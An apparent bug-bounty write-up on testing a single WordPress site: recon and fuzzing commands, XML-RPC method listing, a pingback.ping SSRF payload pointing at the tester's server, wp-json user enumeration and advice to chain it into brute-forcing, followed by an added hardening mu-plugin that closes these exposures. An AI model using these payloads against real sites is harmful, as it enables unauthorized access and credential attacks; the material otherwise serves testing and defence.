Hello everyone, I hope you all are doing great. I am back with another write-up, this time about some of my findings, so let's start.
This time a project came in with a very small scope: only one URL, let's say www.victim.com.
For the first step, we gathered all the information we could.
That started with determining the technologies and web server, for which we used Wappalyzer.
Next, let's locate some of the standard files like /robots.txt, /crossdomain.xml, /clientaccesspolicy.xml, /sitemap.xml and /.well-known/.
Then let's move to the next step, directory enumeration and fuzzing, for which I use a bunch of tools:
dirhunt https://victim.com/
hakrawler -domain https://victim.com/
gospider -s "https://victim.com/" -o output -c 10 -d 1
gospider -S sites.txt -o output -c 10 -d 1
gospider -s "https://victim.com/" -o output -c 10 -d 1 --other-source --include-subs
ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w OneListForAll/onelistforall.txt -u https://victim.com/FUZZ
gau victim.com | unfurl -u paths | sed 's#/#\n#g' | sort -u > paths.txt
gau victim.com | unfurl -u keys
gau victim.com | head -n 1000 | fff -s 200 -s 404
You can use many more.
From these I got a bunch of directories and files, so let's start the exploitation phase; we will discuss recon some other day.
From this I learned that the website was running WordPress, and I started looking for all the vulnerabilities that could be present.
Let's discuss them all.
The first one is xmlrpc.php being enabled. To detect this, just visit www.victim.com/xmlrpc.php; the page will show an error message saying it only accepts POST requests.
Let's exploit this one.
First capture the request in Burp and change the method from GET to POST.
Now list the available methods with:
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>
Perform SSRF with:
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://<YOUR SERVER >:<port></string></value></param>
    <param><value><string>http://<Some Valid Location ></string></value></param>
  </params>
</methodCall>
On visiting www.victim.com/wp-json/wp/v2/users we were able to see the users.
When you have both xmlrpc.php and user enumeration at your disposal, it is a potent combination. You are not limited to reading user details through wp-json: the usernames it reveals can be fed into a brute-force attack via xmlrpc.php.
With xmlrpc.php you are not just passively gathering information; you are actively interacting with the WordPress site and potentially gaining unauthorized access. User enumeration adds fuel to the fire, because you no longer have to guess which accounts exist.
By chaining these two techniques together you demonstrate extra effort and sophistication in the report, and you significantly increase the chances of success. It is a thrilling part of the job, so let's keep pushing.
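For the site owner's side of this story, here is an added example (my own code, not from the original post or from WordPress) of a must-use plugin that closes the three exposures described above: authenticated XML-RPC, the pingback SSRF surface, and anonymous access to /wp-json/wp/v2/users. The hook names are WordPress core filters; the file name and placement are my own choice.

```php
<?php
/**
 * Plugin Name: Harden XML-RPC and REST user listing (added example)
 * Drop this file into wp-content/mu-plugins/ so it loads before normal plugins.
 */

// 1. Disable authenticated XML-RPC calls (wp.*, blogger.*, metaWeblog.*).
//    Caveat: this filter does NOT remove unauthenticated methods such as
//    pingback.ping or system.listMethods, so step 2 is still required.
add_filter( 'xmlrpc_enabled', '__return_false' );

// 2. Remove the pingback methods used for SSRF, plus the multicall wrapper
//    that lets a single request carry many login attempts.
add_filter( 'xmlrpc_methods', function ( array $methods ) {
    unset(
        $methods['pingback.ping'],
        $methods['pingback.extensions.getPingbacks'],
        $methods['system.multicall']
    );
    return $methods;
} );

// 3. Stop advertising the endpoint in the X-Pingback response header.
add_filter( 'wp_headers', function ( array $headers ) {
    unset( $headers['X-Pingback'] );
    return $headers;
} );

// 4. Hide /wp-json/wp/v2/users from anonymous visitors. Logged-in users keep
//    it because the block editor's author selector depends on this route.
add_filter( 'rest_endpoints', function ( array $endpoints ) {
    if ( is_user_logged_in() ) {
        return $endpoints;
    }
    foreach ( array( '/wp/v2/users', '/wp/v2/users/(?P<id>[\d]+)' ) as $route ) {
        unset( $endpoints[ $route ] );
    }
    return $endpoints;
} );
```

To confirm it took effect, repeat the checks from the write-up against your own site: the system.listMethods response should no longer contain pingback.ping, and an anonymous GET to /wp-json/wp/v2/users should return a 404 with the rest_no_route code.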